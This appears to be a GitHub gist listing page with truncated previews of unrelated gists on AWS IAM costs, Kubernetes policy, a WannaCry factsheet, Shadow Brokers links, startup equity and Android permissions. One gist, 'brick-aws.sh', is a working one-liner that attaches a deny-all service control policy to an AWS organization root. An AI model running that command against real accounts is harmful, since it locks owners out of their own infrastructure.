In order of first appearance in The Morning Paper.
Madhu Akula madhuakula
⏳
iann0036
/ gist:b473bbb3097c5f4c656ed3d07b4d2222
Last active
April 28, 2024 11:47
List of expensive / long-term effect AWS IAM actions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| route53domains:RegisterDomain | |
| route53domains:RenewDomain | |
| route53domains:TransferDomain | |
| ec2:ModifyReservedInstances | |
| ec2:PurchaseHostReservation | |
| ec2:PurchaseReservedInstancesOffering | |
| ec2:PurchaseScheduledInstances | |
| rds:PurchaseReservedDBInstancesOffering | |
| dynamodb:PurchaseReservedCapacityOfferings | |
| s3:PutObjectRetention |
kmcquade
/ brick-aws.sh
Last active
September 26, 2023 22:52
One-liner to brick AWS accounts from the Master Payer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws organizations attach-policy \ | |
| --policy-id $(aws organizations create-policy --name pwn \ | |
| --type SERVICE_CONTROL_POLICY \ | |
| --description "pwn" | |
| --content '{"Version": "2012-10-17","Statement": [{"Effect": "Deny", "Action": "*", "Resource": "*"}]}' \ | |
| | jq ".Policy.PolicySummary.Id"\ | |
| ) \ | |
| --target-id $(aws organizations list-roots | jq ".Roots | .[0].Id") |
acolyer
/ jessfraz.md
Created
November 19, 2017 13:39
Containers, operating systems and other fun things from The Morning Paper
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: extensions/v1beta1 | |
| kind: PodSecurityPolicy | |
| metadata: | |
| name: restricted | |
| annotations: | |
| seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default' | |
| apparmor.security.beta.kubernetes.io/allowedProfileNames: 'runtime/default' | |
| seccomp.security.alpha.kubernetes.io/defaultProfileName: 'docker/default' | |
| apparmor.security.beta.kubernetes.io/defaultProfileName: 'runtime/default' | |
| spec: |
rain-1
/ Wannacrypt0r-FACTSHEET.md
Last active
March 10, 2024 11:03
— forked from Epivalent/Wannacrypt0r-FACTSHEET.md
- Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
- Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
- Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
- Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
- Kill switch: If the website
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comis up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).
update: A minor variant of the viru
iam1980
/ resources.md
Last active
August 16, 2023 18:55
Shadow Brokers EQGRP Lost in Translation resources
scrapped from @x0rz,@etlow,@Dinosn,@hackerfantastic,@highmeh,@cyb3rops and others
- A quick analysis of the latest Shadow Brokers dump https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/
- Timestamps
yossorion
/ what-i-wish-id-known-about-equity-before-joining-a-unicorn.md
Last active
June 25, 2024 07:29
What I Wish I'd Known About Equity Before Joining A Unicorn
Disclaimer: This piece is written anonymously. The names of a few particular companies are mentioned, but as common examples only.
This is a short write-up on things that I wish I'd known and considered before joining a private company (aka startup, aka unicorn in some cases). I'm not trying to make the case that you should never join a private company, but the power imbalance between founder and employee is extreme, and that potential candidates would
- How to Build a Successful Information Security Career (Daniel Miessler)
- The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
- Hiring your first Security Professional (Peerlyst - Dawid Balut)
- How to Start a Career in Cyber security
- How to Get Into Information Security (ISC^2)
- https://www.isc2.org/how-to-get-into-information-security.aspx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| android.permission.ACCESS_ALL_DOWNLOADS | |
| android.permission.ACCESS_BLUETOOTH_SHARE | |
| android.permission.ACCESS_CACHE_FILESYSTEM | |
| android.permission.ACCESS_CHECKIN_PROPERTIES | |
| android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY | |
| android.permission.ACCESS_DOWNLOAD_MANAGER | |
| android.permission.ACCESS_DOWNLOAD_MANAGER_ADVANCED | |
| android.permission.ACCESS_DRM_CERTIFICATES | |
| android.permission.ACCESS_EPHEMERAL_APPS | |
| android.permission.ACCESS_FM_RADIO |
elementalvoid
/ grok-to-regex.py
Created
August 17, 2016 21:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import re | |
| from os import walk | |
| from os.path import join | |
| def get_patterns(patterns_dir): | |
| patterns = {} |
NewerOlder